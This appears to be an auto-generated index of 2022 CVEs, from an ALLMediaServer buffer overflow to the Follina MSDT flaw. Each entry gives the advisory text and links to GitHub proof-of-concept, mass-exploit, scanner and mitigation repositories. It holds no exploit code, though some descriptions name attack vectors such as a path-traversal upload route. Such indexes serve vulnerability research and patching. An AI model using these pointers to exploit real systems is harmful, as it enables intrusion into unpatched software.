### CVE-2022-28381 (2022-04-03)

Mediaserver.exe in ALLMediaServer 1.6 has a stack-based buffer overflow that allows remote attackers to execute arbitrary code via a long string to TCP port 888, a related issue to CVE-2017-17932.

- [DShankle/CVE-2022-28381_PoC](https://github.com/DShankle/CVE-2022-28381_PoC)

### CVE-2022-28452 (2022-04-29)

Red Planet Laundry Management System 1.0 is vulnerable to SQL Injection.

- [YavuzSahbaz/Red-Planet-Laundry-Management-System-1.0-is-vulnerable-to-SQL](https://github.com/YavuzSahbaz/Red-Planet-Laundry-Management-System-1.0-is-vulnerable-to-SQL)

### CVE-2022-28454 (2022-04-28)

Limbas 4.3.36.1319 is vulnerable to Cross Site Scripting (XSS).

- [YavuzSahbaz/Limbas-4.3.36.1319-is-vulnerable-to-Cross-Site-Scripting-XSS-](https://github.com/YavuzSahbaz/Limbas-4.3.36.1319-is-vulnerable-to-Cross-Site-Scripting-XSS-)

### CVE-2022-28508 (2022-05-04)

An XSS issue was discovered in browser_search_plugin.php in MantisBT before 2.25.2. Unescaped output of the return parameter allows an attacker to inject code into a hidden input field.

- [YavuzSahbaz/CVE-2022-28508](https://github.com/YavuzSahbaz/CVE-2022-28508)

### CVE-2022-28590 (2022-05-03)

A Remote Code Execution (RCE) vulnerability exists in Pixelimity 1.0 via admin/admin-ajax.php?action=install_theme.

- [jcarabantes/CVE-2022-28590](https://github.com/jcarabantes/CVE-2022-28590)

### CVE-2022-28598 (2022-08-22)

Frappe ERPNext 12.29.0 is vulnerable to XSS where the software does not neutralize or incorrectly neutralize user-controllable input before it is placed in output that is used as a web page that is served to other users.

- [patrickdeanramos/CVE-2022-28598](https://github.com/patrickdeanramos/CVE-2022-28598)

### CVE-2022-28601 (2022-05-10)

A Two-Factor Authentication (2FA) bypass vulnerability in "Simple 2FA Plugin for Moodle" by LMS Doctor allows remote attackers to overwrite the phone number used for confirmation via the profile.php file, thereby allowing them to bypass the phone verification mechanism.

- [FlaviuPopescu/CVE-2022-28601](https://github.com/FlaviuPopescu/CVE-2022-28601)

### CVE-2022-28672 (2022-07-18)

This vulnerability allows remote attackers to execute arbitrary code on affected installations of Foxit PDF Reader 11.2.1.53537. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file. The specific flaw exists within the handling of Doc objects. The issue results from the lack of validating the existence of an object prior to performing operations on the object. An attacker can leverage this vulnerability to execute code in the context of the current process. Was ZDI-CAN-16640.

- [hacksysteam/CVE-2022-28672](https://github.com/hacksysteam/CVE-2022-28672)
- [fastmo/CVE-2022-28672](https://github.com/fastmo/CVE-2022-28672)

### CVE-2022-28943
- [zhefox/CVE-2022-28943](https://github.com/zhefox/CVE-2022-28943)

### CVE-2022-28944 (2022-05-23)

Certain EMCO Software products are affected by: CWE-494: Download of Code Without Integrity Check. This affects MSI Package Builder for Windows 9.1.4 and Remote Installer for Windows 6.0.13 and Ping Monitor for Windows 8.0.18 and Remote Shutdown for Windows 7.2.2 and WakeOnLan 2.0.8 and Network Inventory for Windows 5.8.22 and Network Software Scanner for Windows 2.0.8 and UnLock IT for Windows 6.1.1. The impact is: execute arbitrary code (remote). The component is: Updater. The attack vector is: To exploit this vulnerability, a user must trigger an update of an affected installation of EMCO Software. Multiple products from EMCO Software are affected by a remote code execution vulnerability during the update process.

- [gerr-re/cve-2022-28944](https://github.com/gerr-re/cve-2022-28944)

### CVE-2022-28986 (2022-05-10)

LMS Doctor Simple 2 Factor Authentication Plugin for Moodle (affected version: 2021072900) has an insecure direct object reference (IDOR) vulnerability, which allows remote attackers to update sensitive records such as the email, password and phone number of other user accounts.

- [FlaviuPopescu/CVE-2022-28986](https://github.com/FlaviuPopescu/CVE-2022-28986)

### CVE-2022-29004 (2022-05-23)

Diary Management System v1.0 was discovered to contain a cross-site scripting (XSS) vulnerability via the Name parameter in search-result.php.

- [sudoninja-noob/CVE-2022-29004](https://github.com/sudoninja-noob/CVE-2022-29004)

### CVE-2022-29005 (2022-05-23)

Multiple cross-site scripting (XSS) vulnerabilities in the component /obcs/user/profile.php of Online Birth Certificate System v1.2 allow attackers to execute arbitrary web scripts or HTML via a crafted payload injected into the fname or lname parameters.

- [sudoninja-noob/CVE-2022-29005](https://github.com/sudoninja-noob/CVE-2022-29005)

### CVE-2022-29006 (2022-05-11)

Multiple SQL injection vulnerabilities via the username and password parameters in the Admin panel of Directory Management System v1.0 allow attackers to bypass authentication.

- [sudoninja-noob/CVE-2022-29006](https://github.com/sudoninja-noob/CVE-2022-29006)

### CVE-2022-29007 (2022-05-11)

Multiple SQL injection vulnerabilities via the username and password parameters in the Admin panel of Dairy Farm Shop Management System v1.0 allow attackers to bypass authentication.

- [sudoninja-noob/CVE-2022-29007](https://github.com/sudoninja-noob/CVE-2022-29007)

### CVE-2022-29008 (2022-05-11)

An insecure direct object reference (IDOR) vulnerability in the viewid parameter of Bus Pass Management System v1.0 allows attackers to access sensitive information.

- [sudoninja-noob/CVE-2022-29008](https://github.com/sudoninja-noob/CVE-2022-29008)

### CVE-2022-29009 (2022-05-11)

Multiple SQL injection vulnerabilities via the username and password parameters in the Admin panel of Cyber Cafe Management System Project v1.0 allow attackers to bypass authentication.

- [sudoninja-noob/CVE-2022-29009](https://github.com/sudoninja-noob/CVE-2022-29009)

### CVE-2022-29063 (2022-09-02)

The Solr plugin of Apache OFBiz is configured by default to automatically make an RMI request on localhost, port 1099. In version 18.12.05 and earlier, by hosting a malicious RMI server on localhost, an attacker may exploit this behavior, at server start-up or on a server restart, in order to run arbitrary code. Upgrade to at least 18.12.06 or apply patches at https://issues.apache.org/jira/browse/OFBIZ-12646.

- [mbadanoiu/CVE-2022-29063](https://github.com/mbadanoiu/CVE-2022-29063)

### CVE-2022-29072 (2022-04-15)

7-Zip through 21.07 on Windows allows privilege escalation and command execution when a file with the .7z extension is dragged to the Help>Contents area. This is caused by misconfiguration of 7z.dll and a heap overflow. The command runs in a child process under the 7zFM.exe process. NOTE: multiple third parties have reported that no privilege escalation can occur.

- [kagancapar/CVE-2022-29072](https://github.com/kagancapar/CVE-2022-29072)
- [tiktb8/CVE-2022-29072](https://github.com/tiktb8/CVE-2022-29072)
- [sentinelblue/CVE-2022-29072](https://github.com/sentinelblue/CVE-2022-29072)
- [Phantomiman/7-Zip.chm-Mitigation](https://github.com/Phantomiman/7-Zip.chm-Mitigation)
- [rasan2001/CVE-2022-29072](https://github.com/rasan2001/CVE-2022-29072)

### CVE-2022-29078 (2022-04-25)

The ejs (aka Embedded JavaScript templates) package 3.1.6 for Node.js allows server-side template injection in settings[view options][outputFunctionName]. This is parsed as an internal option, and overwrites the outputFunctionName option with an arbitrary OS command (which is executed upon template compilation).

- [miko550/CVE-2022-29078](https://github.com/miko550/CVE-2022-29078)
- [liam-star-black-master/expluatation_CVE-2022-29078](https://github.com/liam-star-black-master/expluatation_CVE-2022-29078)

### CVE-2022-29154 (2022-08-02)

An issue was discovered in rsync before 3.2.5 that allows malicious remote servers to write arbitrary files inside the directories of connecting peers. The server chooses which files/directories are sent to the client. However, the rsync client performs insufficient validation of file names. A malicious rsync server (or Man-in-The-Middle attacker) can overwrite arbitrary files in the rsync client target directory and subdirectories (for example, overwrite the .ssh/authorized_keys file).

- [EgeBalci/CVE-2022-29154](https://github.com/EgeBalci/CVE-2022-29154)

### CVE-2022-29170 (2022-05-20)

Grafana is an open-source platform for monitoring and observability. In Grafana Enterprise, the Request security allow list feature allows Grafana to be configured so that the instance does not call, or only calls, specific hosts. The vulnerability, present starting with version 7.4.0-beta1 and prior to versions 7.5.16 and 8.5.3, allows someone to bypass these security configurations if a malicious datasource (running on an allowed host) returns an HTTP redirect to a forbidden host. The vulnerability only impacts Grafana Enterprise when the Request security allow list is used and there is a possibility to add a custom datasource to Grafana which returns HTTP redirects. In this scenario, Grafana would blindly follow the redirects and potentially give sensitive information to the clients. Grafana Cloud is not impacted by this vulnerability. Versions 7.5.16 and 8.5.3 contain a patch for this issue. There are currently no known workarounds.

- [yijikeji/CVE-2022-29170](https://github.com/yijikeji/CVE-2022-29170)

### CVE-2022-29221 (2022-05-24)

Smarty is a template engine for PHP, facilitating the separation of presentation (HTML/CSS) from application logic. Prior to versions 3.1.45 and 4.1.1, template authors could inject PHP code by choosing a malicious {block} name or {include} file name. Sites that cannot fully trust template authors should upgrade to versions 3.1.45 or 4.1.1 to receive a patch for this issue. There are currently no known workarounds.

- [sbani/CVE-2022-29221-PoC](https://github.com/sbani/CVE-2022-29221-PoC)

### CVE-2022-29303 (2022-05-12)

SolarView Compact ver.6.00 was discovered to contain a command injection vulnerability via conf_mail.php.

- [Chocapikk/CVE-2022-29303](https://github.com/Chocapikk/CVE-2022-29303)
- [1f3lse/CVE-2022-29303](https://github.com/1f3lse/CVE-2022-29303)

### CVE-2022-29337 (2022-05-24)

C-DATA FD702XW-X-R430 v2.1.13_X001 was discovered to contain a command injection vulnerability via the va_cmd parameter in formlanipv6. This vulnerability allows attackers to execute arbitrary commands via a crafted HTTP request.

- [exploitwritter/CVE-2022-29337](https://github.com/exploitwritter/CVE-2022-29337)

### CVE-2022-29359 (2022-05-24)

A stored cross-site scripting (XSS) vulnerability in /scas/?page=clubs/application_form&id=7 of School Club Application System v0.1 allows attackers to execute arbitrary web scripts or HTML via a crafted payload injected into the firstname parameter.

- [ZSECURE/CVE-2022-29359](https://github.com/ZSECURE/CVE-2022-29359)

### CVE-2022-29361 (2022-05-24)

Improper parsing of HTTP requests in Pallets Werkzeug v2.1.0 and below allows attackers to perform HTTP Request Smuggling using a crafted HTTP request with multiple requests included inside the body. NOTE: the vendor's position is that this behavior can only occur in unsupported configurations involving development mode and an HTTP server from outside the Werkzeug project.

- [kevin-mizu/Werkzeug-CVE-2022-29361-PoC](https://github.com/kevin-mizu/Werkzeug-CVE-2022-29361-PoC)
- [l3ragio/CVE-2022-29361_Werkzeug_Client-Side-Desync-to-XSS](https://github.com/l3ragio/CVE-2022-29361_Werkzeug_Client-Side-Desync-to-XSS)

### CVE-2022-29380 (2022-05-25)

Academy-LMS v4.3 was discovered to contain a stored cross-site scripting (XSS) vulnerability in the SEO panel.

- [OpenXP-Research/CVE-2022-29380](https://github.com/OpenXP-Research/CVE-2022-29380)

### CVE-2022-29383 (2022-05-13)

NETGEAR ProSafe SSL VPN firmware FVS336Gv2 and FVS336Gv3 was discovered to contain a SQL injection vulnerability via USERDBDomains.Domainname at cgi-bin/platform.cgi.

- [badboycxcc/Netgear-ssl-vpn-20211222-CVE-2022-29383](https://github.com/badboycxcc/Netgear-ssl-vpn-20211222-CVE-2022-29383)
- [cxaqhq/netgear-to-CVE-2022-29383](https://github.com/cxaqhq/netgear-to-CVE-2022-29383)

### CVE-2022-29455 (2022-06-13)

DOM-based Reflected Cross-Site Scripting (XSS) vulnerability in versions <= 3.5.5 of Elementor's Elementor Website Builder plugin.

- [GULL2100/Wordpress_xss-CVE-2022-29455](https://github.com/GULL2100/Wordpress_xss-CVE-2022-29455)
- [akhilkoradiya/CVE-2022-29455](https://github.com/akhilkoradiya/CVE-2022-29455)
- [yaudahbanh/CVE-2022-29455](https://github.com/yaudahbanh/CVE-2022-29455)
- [0xc4t/CVE-2022-29455](https://github.com/0xc4t/CVE-2022-29455)
- [tucommenceapousser/CVE-2022-29455](https://github.com/tucommenceapousser/CVE-2022-29455)
- [tucommenceapousser/CVE-2022-29455-mass](https://github.com/tucommenceapousser/CVE-2022-29455-mass)

### CVE-2022-29464 (2022-04-18)

Certain WSO2 products allow unrestricted file upload with resultant remote code execution. The attacker must use a /fileupload endpoint with a Content-Disposition directory traversal sequence to reach a directory under the web root, such as a ../../../../repository/deployment/server/webapps directory. This affects WSO2 API Manager 2.2.0 up to 4.0.0, WSO2 Identity Server 5.2.0 up to 5.11.0, WSO2 Identity Server Analytics 5.4.0, 5.4.1, 5.5.0 and 5.6.0, WSO2 Identity Server as Key Manager 5.3.0 up to 5.11.0, WSO2 Enterprise Integrator 6.2.0 up to 6.6.0, WSO2 Open Banking AM 1.4.0 up to 2.0.0 and WSO2 Open Banking KM 1.4.0, up to 2.0.0.

- [hakivvi/CVE-2022-29464](https://github.com/hakivvi/CVE-2022-29464)
- [tufanturhan/wso2-rce-cve-2022-29464](https://github.com/tufanturhan/wso2-rce-cve-2022-29464)
- [mr-r3bot/WSO2-CVE-2022-29464](https://github.com/mr-r3bot/WSO2-CVE-2022-29464)
- [Lidong-io/cve-2022-29464](https://github.com/Lidong-io/cve-2022-29464)
- [hev0x/CVE-2022-29464](https://github.com/hev0x/CVE-2022-29464)
- [gpiechnik2/nmap-CVE-2022-29464](https://github.com/gpiechnik2/nmap-CVE-2022-29464)
- [0xAgun/CVE-2022-29464](https://github.com/0xAgun/CVE-2022-29464)
- [oppsec/WSOB](https://github.com/oppsec/WSOB)
- [h3xcr4ck3r/CVE-2022-29464](https://github.com/h3xcr4ck3r/CVE-2022-29464)
- [lowkey0808/cve-2022-29464](https://github.com/lowkey0808/cve-2022-29464)
- [superzerosec/CVE-2022-29464](https://github.com/superzerosec/CVE-2022-29464)
- [axin2019/CVE-2022-29464](https://github.com/axin2019/CVE-2022-29464)
- [LinJacck/CVE-2022-29464](https://github.com/LinJacck/CVE-2022-29464)
- [Inplex-sys/CVE-2022-29464-loader](https://github.com/Inplex-sys/CVE-2022-29464-loader)
- [Chocapikk/CVE-2022-29464](https://github.com/Chocapikk/CVE-2022-29464)
- [jimidk/Better-CVE-2022-29464](https://github.com/jimidk/Better-CVE-2022-29464)
- [electr0lulz/Mass-exploit-CVE-2022-29464](https://github.com/electr0lulz/Mass-exploit-CVE-2022-29464)
- [xinghonghaoyue/CVE-2022-29464](https://github.com/xinghonghaoyue/CVE-2022-29464)
- [Pasch0/WSO2RCE](https://github.com/Pasch0/WSO2RCE)
- [r4x0r1337/-CVE-2022-29464](https://github.com/r4x0r1337/-CVE-2022-29464)
- [amit-pathak009/CVE-2022-29464](https://github.com/amit-pathak009/CVE-2022-29464)
- [amit-pathak009/CVE-2022-29464-mass](https://github.com/amit-pathak009/CVE-2022-29464-mass)
- [hupe1980/CVE-2022-29464](https://github.com/hupe1980/CVE-2022-29464)
- [gbrsh/CVE-2022-29464](https://github.com/gbrsh/CVE-2022-29464)
- [devengpk/CVE-2022-29464](https://github.com/devengpk/CVE-2022-29464)
- [ThatNotEasy/CVE-2022-29464](https://github.com/ThatNotEasy/CVE-2022-29464)
- [Pushkarup/CVE-2022-29464](https://github.com/Pushkarup/CVE-2022-29464)
- [SynixCyberCrimeMy/CVE-2022-29464](https://github.com/SynixCyberCrimeMy/CVE-2022-29464)
- [cc3305/CVE-2022-29464](https://github.com/cc3305/CVE-2022-29464)

### CVE-2022-29465 (2022-08-05)

An out-of-bounds write vulnerability exists in the PSD Header processing memory allocation functionality of Accusoft ImageGear 20.0. A specially-crafted malformed file can lead to memory corruption. An attacker can provide a malicious file to trigger this vulnerability.

- [badguy233/CVE-2022-29465](https://github.com/badguy233/CVE-2022-29465)

### CVE-2022-29469
- [S4muraiMelayu1337/CVE-2022-29469](https://github.com/S4muraiMelayu1337/CVE-2022-29469)

### CVE-2022-29548 (2022-04-21)

A reflected XSS issue exists in the Management Console of several WSO2 products. This affects API Manager 2.2.0, 2.5.0, 2.6.0, 3.0.0, 3.1.0, 3.2.0, and 4.0.0; API Manager Analytics 2.2.0, 2.5.0, and 2.6.0; API Microgateway 2.2.0; Data Analytics Server 3.2.0; Enterprise Integrator 6.2.0, 6.3.0, 6.4.0, 6.5.0, and 6.6.0; IS as Key Manager 5.5.0, 5.6.0, 5.7.0, 5.9.0, and 5.10.0; Identity Server 5.5.0, 5.6.0, 5.7.0, 5.9.0, 5.10.0, and 5.11.0; Identity Server Analytics 5.5.0 and 5.6.0; and WSO2 Micro Integrator 1.0.0.

- [cxosmo/CVE-2022-29548](https://github.com/cxosmo/CVE-2022-29548)

### CVE-2022-29551
- [ComparedArray/printix-CVE-2022-29551](https://github.com/ComparedArray/printix-CVE-2022-29551)

### CVE-2022-29552
- [ComparedArray/printix-CVE-2022-29552](https://github.com/ComparedArray/printix-CVE-2022-29552)

### CVE-2022-29553
- [ComparedArray/printix-CVE-2022-29553](https://github.com/ComparedArray/printix-CVE-2022-29553)

### CVE-2022-29554
- [ComparedArray/printix-CVE-2022-29554](https://github.com/ComparedArray/printix-CVE-2022-29554)

### CVE-2022-29581 (2022-05-17)

Improper Update of Reference Count vulnerability in net/sched of the Linux Kernel allows a local attacker to cause privilege escalation to root. This issue affects Linux Kernel versions 4.14 and later, prior to 5.18.

- [Nidhi77777/linux-4.19.72_CVE-2022-29581](https://github.com/Nidhi77777/linux-4.19.72_CVE-2022-29581)
- [nidhihcl/linux-4.19.72_CVE-2022-29581](https://github.com/nidhihcl/linux-4.19.72_CVE-2022-29581)

### CVE-2022-29582 (2022-04-22)

In the Linux kernel before 5.17.3, fs/io_uring.c has a use-after-free due to a race condition in io_uring timeouts. This can be triggered by a local user who has no access to any user namespace; however, the race condition perhaps can only be exploited infrequently.

- [Ruia-ruia/CVE-2022-29582-Exploit](https://github.com/Ruia-ruia/CVE-2022-29582-Exploit)

### CVE-2022-29593 (2022-07-14)

relay_cgi.cgi on Dingtian DT-R002 2CH relay devices with firmware 3.1.276A allows an attacker to replay HTTP POST requests without the need for authentication or a valid signed/authorized request.

- [9lyph/CVE-2022-29593](https://github.com/9lyph/CVE-2022-29593)

### CVE-2022-29597 (2022-06-02)

Solutions Atlantic Regulatory Reporting System (RRS) v500 is vulnerable to Local File Inclusion (LFI). Any authenticated user has the ability to reference internal system files within requests made to the RRSWeb/maint/ShowDocument/ShowDocument.aspx page. The server will successfully respond with the file contents of the internal system file requested. This ability could allow for adversaries to extract sensitive data and/or files from the underlying file system, gain knowledge about the internal workings of the system, or access source code of the application.

- [TheGetch/CVE-2022-29597](https://github.com/TheGetch/CVE-2022-29597)

### CVE-2022-29598 (2022-05-27)

Solutions Atlantic Regulatory Reporting System (RRS) v500 is vulnerable to a reflected Cross-Site Scripting (XSS) vulnerability via RRSWeb/maint/ShowDocument/ShowDocument.aspx.

- [TheGetch/CVE-2022-29598](https://github.com/TheGetch/CVE-2022-29598)

### CVE-2022-29622 (2022-05-16)

An arbitrary file upload vulnerability in formidable v3.1.4 allows attackers to execute arbitrary code via a crafted filename. NOTE: some third parties dispute this issue because the product has common use cases in which uploading arbitrary files is the desired behavior. Also, there are configuration options in all versions that can change the default behavior of how files are handled. Strapi does not consider this to be a valid vulnerability.

- [keymandll/CVE-2022-29622](https://github.com/keymandll/CVE-2022-29622)

### CVE-2022-29778 (2022-06-03)

D-Link DIR-890L 1.20b01 allows attackers to execute arbitrary code due to the hardcoded option Wake-On-Lan for the parameter 'descriptor' at SetVirtualServerSettings.php.

- [TyeYeah/DIR-890L-1.20-RCE](https://github.com/TyeYeah/DIR-890L-1.20-RCE)

### CVE-2022-29856 (2022-04-29)

A hardcoded cryptographic key in Automation360 22 allows an attacker to decrypt exported RPA packages.

- [Flo451/CVE-2022-29856-PoC](https://github.com/Flo451/CVE-2022-29856-PoC)

### CVE-2022-29885 (2022-05-12)

The documentation of Apache Tomcat 10.1.0-M1 to 10.1.0-M14, 10.0.0-M1 to 10.0.20, 9.0.13 to 9.0.62 and 8.5.38 to 8.5.78 for the EncryptInterceptor incorrectly stated it enabled Tomcat clustering to run over an untrusted network. This was not correct. While the EncryptInterceptor does provide confidentiality and integrity protection, it does not protect against all risks associated with running over any untrusted network, particularly DoS risks.

- [quynhlab/CVE-2022-29885](https://github.com/quynhlab/CVE-2022-29885)
- [iveresk/CVE-2022-29885](https://github.com/iveresk/CVE-2022-29885)

### CVE-2022-29932 (2022-05-11)

The HTTP Server in PRIMEUR SPAZIO 2.5.1.954 (File Transfer) allows an unauthenticated attacker to obtain sensitive data (related to the content of transferred files) via a crafted HTTP request.

- [Off3nS3c/CVE-2022-29932](https://github.com/Off3nS3c/CVE-2022-29932)

### CVE-2022-29968 (2022-05-02)

An issue was discovered in the Linux kernel through 5.17.5. io_rw_init_file in fs/io_uring.c lacks initialization of kiocb->private.

- [jprx/CVE-2022-29968](https://github.com/jprx/CVE-2022-29968)

### CVE-2022-30006
- [ComparedArray/printix-CVE-2022-30006](https://github.com/ComparedArray/printix-CVE-2022-30006)

### CVE-2022-30023 (2022-06-16)

Tenda ONT GPON AC1200 Dual band WiFi HG9 v1.0.1 is vulnerable to Command Injection via the Ping function.

- [Haniwa0x01/CVE-2022-30023](https://github.com/Haniwa0x01/CVE-2022-30023)

### CVE-2022-30040 (2022-05-11)

Tenda AX1803 v1.0.0.1_2890 is vulnerable to Buffer Overflow. The vulnerability lies in /goform/SetSysTimeCfg of /bin/tdhttpd in the rootfs (UBIFS) file system: attackers can access http://ip/goform/SetSysTimeCfg and, by setting the ntpserve parameter, cause a stack buffer overflow that results in router denial of service.

- [Le1a/CVE-2022-30040](https://github.com/Le1a/CVE-2022-30040)

### CVE-2022-30075 (2022-06-09)

In TP-Link Router AX50 firmware 210730 and older, import of a malicious backup file via web interface can lead to remote code execution due to improper validation.

- [aaronsvk/CVE-2022-30075](https://github.com/aaronsvk/CVE-2022-30075)
- [SAJIDAMINE/CVE-2022-30075](https://github.com/SAJIDAMINE/CVE-2022-30075)
- [M4fiaB0y/CVE-2022-30075](https://github.com/M4fiaB0y/CVE-2022-30075)

### CVE-2022-30114 (2023-05-19)

A heap-based buffer overflow in a network service in Fastweb FASTGate MediaAccess FGA2130FWB, firmware version 18.3.n.0482_FW_230_FGA2130, and DGA4131FWB, firmware version up to 18.3.n.0462_FW_261_DGA4131, allows a remote attacker to reboot the device through a crafted HTTP request, causing DoS.

- [str0ng4le/CVE-2022-30114](https://github.com/str0ng4le/CVE-2022-30114)

### CVE-2022-30129 (2022-05-10)

Visual Studio Code Remote Code Execution Vulnerability

- [RoccoPearce/CVE-2022-30129](https://github.com/RoccoPearce/CVE-2022-30129)

### CVE-2022-30136 (2022-06-15)

Windows Network File System Remote Code Execution Vulnerability

- [fortra/CVE-2022-30136](https://github.com/fortra/CVE-2022-30136)
- [AXRoux/CVE-2022-30136](https://github.com/AXRoux/CVE-2022-30136)

### CVE-2022-30190 (2022-06-01)

A remote code execution vulnerability exists when MSDT is called using the URL protocol from a calling application such as Word. An attacker who successfully exploits this vulnerability can run arbitrary code with the privileges of the calling application. The attacker can then install programs, view, change, or delete data, or create new accounts in the context allowed by the user's rights. Please see the MSRC Blog Entry for important information about steps you can take to protect your system from this vulnerability.

- [JMousqueton/PoC-CVE-2022-30190](https://github.com/JMousqueton/PoC-CVE-2022-30190)
- [zkl21hoang/msdt-follina-office-rce](https://github.com/zkl21hoang/msdt-follina-office-rce)
- [onecloudemoji/CVE-2022-30190](https://github.com/onecloudemoji/CVE-2022-30190)
- [2867a0/CVE-2022-30190](https://github.com/2867a0/CVE-2022-30190)
- [doocop/CVE-2022-30190](https://github.com/doocop/CVE-2022-30190)
- [archanchoudhury/MSDT_CVE-2022-30190](https://github.com/archanchoudhury/MSDT_CVE-2022-30190)
- [rickhenderson/cve-2022-30190](https://github.com/rickhenderson/cve-2022-30190)
- [DOV3Y/CVE-2022-30190-ASR-Senintel-Process-Pickup](https://github.com/DOV3Y/CVE-2022-30190-ASR-Senintel-Process-Pickup)
- [kdk2933/msdt-CVE-2022-30190](https://github.com/kdk2933/msdt-CVE-2022-30190)
- [sentinelblue/CVE-2022-30190](https://github.com/sentinelblue/CVE-2022-30190)
- [aymankhder/MSDT_CVE-2022-30190-follina-](https://github.com/aymankhder/MSDT_CVE-2022-30190-follina-)
- [PaddlingCode/cve-2022-30190](https://github.com/PaddlingCode/cve-2022-30190)
- [dwisiswant0/gollina](https://github.com/dwisiswant0/gollina)
- [hscorpion/CVE-2022-30190](https://github.com/hscorpion/CVE-2022-30190)
- [drgreenthumb93/CVE-2022-30190-follina](https://github.com/drgreenthumb93/CVE-2022-30190-follina)
- [mitespsoc/CVE-2022-30190-POC](https://github.com/mitespsoc/CVE-2022-30190-POC)
- [Vaisakhkm2625/MSDT-0-Day-CVE-2022-30190-Poc](https://github.com/Vaisakhkm2625/MSDT-0-Day-CVE-2022-30190-Poc)
- [rouben/CVE-2022-30190-NSIS](https://github.com/rouben/CVE-2022-30190-NSIS)
- [Cosmo121/Follina-Remediation](https://github.com/Cosmo121/Follina-Remediation)
- [rayorole/CVE-2022-30190](https://github.com/rayorole/CVE-2022-30190)
- [ImproveCybersecurityJaro/2022_PoC-MSDT-Follina-CVE-2022-30190](https://github.com/ImproveCybersecurityJaro/2022_PoC-MSDT-Follina-CVE-2022-30190)
- [sudoaza/CVE-2022-30190](https://github.com/sudoaza/CVE-2022-30190)
- [gamingwithevets/msdt-disable](https://github.com/gamingwithevets/msdt-disable)
- [ErrorNoInternet/FollinaScanner](https://github.com/ErrorNoInternet/FollinaScanner)
- [ITMarcin2211/CVE-2022-30190](https://github.com/ITMarcin2211/CVE-2022-30190)
- [derco0n/mitigate-folina](https://github.com/derco0n/mitigate-folina)
- [komomon/CVE-2022-30190-follina-Office-MSDT-Fixed](https://github.com/komomon/CVE-2022-30190-follina-Office-MSDT-Fixed)
- [gyaansastra/CVE-2022-30190](https://github.com/gyaansastra/CVE-2022-30190)
- [swaiist/CVE-2022-30190-Fix](https://github.com/swaiist/CVE-2022-30190-Fix)
- [suenerve/CVE-2022-30190-Follina-Patch](https://github.com/suenerve/CVE-2022-30190-Follina-Patch)
- [castlesmadeofsand/ms-msdt-vulnerability-pdq-package](https://github.com/castlesmadeofsand/ms-msdt-vulnerability-pdq-package)
- [WesyHub/CVE-2022-30190---Follina---Poc-Exploit](https://github.com/WesyHub/CVE-2022-30190---Follina---Poc-Exploit)
- [0xflagplz/MS-MSDT-Office-RCE-Follina](https://github.com/0xflagplz/MS-MSDT-Office-RCE-Follina)
- [arozx/CVE-2022-30190](https://github.com/arozx/CVE-2022-30190)
- [Noxtal/follina](https://github.com/Noxtal/follina)
- [droidrzrlover/CVE-2022-30190](https://github.com/droidrzrlover/CVE-2022-30190)
- [hilt86/cve-2022-30190-mitigate](https://github.com/hilt86/cve-2022-30190-mitigate)
- [SrikeshMaharaj/CVE-2022-30190](https://github.com/SrikeshMaharaj/CVE-2022-30190)
- [AbdulRKB/Follina](https://github.com/AbdulRKB/Follina)
- [DerZiad/CVE-2022-30190](https://github.com/DerZiad/CVE-2022-30190)
- [tej7gandhi/CVE-2022-30190-Zero-Click-Zero-Day-in-msdt](https://github.com/tej7gandhi/CVE-2022-30190-Zero-Click-Zero-Day-in-msdt)
- [ItsNee/Follina-CVE-2022-30190-POC](https://github.com/ItsNee/Follina-CVE-2022-30190-POC)
- [IamVSM/msdt-follina](https://github.com/IamVSM/msdt-follina)
- [Rojacur/FollinaPatcherCLI](https://github.com/Rojacur/FollinaPatcherCLI)
- [joshuavanderpoll/CVE-2022-30190](https://github.com/joshuavanderpoll/CVE-2022-30190)
- [abhirules27/Follina](https://github.com/abhirules27/Follina)
- [dsibilio/follina-spring](https://github.com/dsibilio/follina-spring)
- [Malwareman007/Deathnote](https://github.com/Malwareman007/Deathnote)
- [sentrium-security/Follina-Workaround-CVE-2022-30190](https://github.com/sentrium-security/Follina-Workaround-CVE-2022-30190)
- [Hrishikesh7665/Follina_Exploiter_CLI](https://github.com/Hrishikesh7665/Follina_Exploiter_CLI)
- [b401/Clickstudio-compromised-certificate](https://github.com/b401/Clickstudio-compromised-certificate)
- [k508/CVE-2022-30190](https://github.com/k508/CVE-2022-30190)
- [amitniz/follina_cve_2022-30190](https://github.com/amitniz/follina_cve_2022-30190)
- [Abdibimantara/CVE-2022-30190-Analysis-With-LetsDefends-Lab](https://github.com/Abdibimantara/CVE-2022-30190-Analysis-With-LetsDefends-Lab)
- [SrCroqueta/CVE-2022-30190_Temporary_Fix](https://github.com/SrCroqueta/CVE-2022-30190_Temporary_Fix)
- [SrCroqueta/CVE-2022-30190_Temporary_Fix_Source_Code](https://github.com/SrCroqueta/CVE-2022-30190_Temporary_Fix_Source_Code)
- [SonicWave21/Follina-CVE-2022-30190-Unofficial-patch](https://github.com/SonicWave21/Follina-CVE-2022-30190-Unofficial-patch)
- [nanaao/PicusSecurity4.Week.Repo](https://github.com/nanaao/PicusSecurity4.Week.Repo)
- [XxToxicScriptxX/CVE-2022-30190](https://github.com/XxToxicScriptxX/CVE-2022-30190)
- [ernestak/CVE-2022-30190](https://github.com/ernestak/CVE-2022-30190)
- [ernestak/Sigma-Rule-for-CVE-2022-30190](https://github.com/ernestak/Sigma-Rule-for-CVE-2022-30190)
- [MalwareTech/FollinaExtractor](https://github.com/MalwareTech/FollinaExtractor)
- [notherealhazard/follina-CVE-2022-30190](https://github.com/notherealhazard/follina-CVE-2022-30190)
- [Cerebrovinny/follina-CVE-2022-30190](https://github.com/Cerebrovinny/follina-CVE-2022-30190)
- [Lucaskrell/go_follina](https://github.com/Lucaskrell/go_follina)
- [Gra3s/CVE-2022-30190_EXP_PowerPoint](https://github.com/Gra3s/CVE-2022-30190_EXP_PowerPoint)
- [EkamSinghWalia/Follina-MSDT-Vulnerability-CVE-2022-30190-](https://github.com/EkamSinghWalia/Follina-MSDT-Vulnerability-CVE-2022-30190-)
- [jeffreybxu/five-nights-at-follina-s](https://github.com/jeffreybxu/five-nights-at-follina-s)
- [Captain404/Follina-CVE-2022-30190-PoC-sample](https://github.com/Captain404/Follina-CVE-2022-30190-PoC-sample)
- [winstxnhdw/CVE-2022-30190](https://github.com/winstxnhdw/CVE-2022-30190)
- [Imeneallouche/Follina-attack-CVE-2022-30190-](https://github.com/Imeneallouche/Follina-attack-CVE-2022-30190-)
- [mattjmillner/CVE-Smackdown](https://github.com/mattjmillner/CVE-Smackdown)
- [0xAbbarhSF/FollinaXploit](https://github.com/0xAbbarhSF/FollinaXploit)
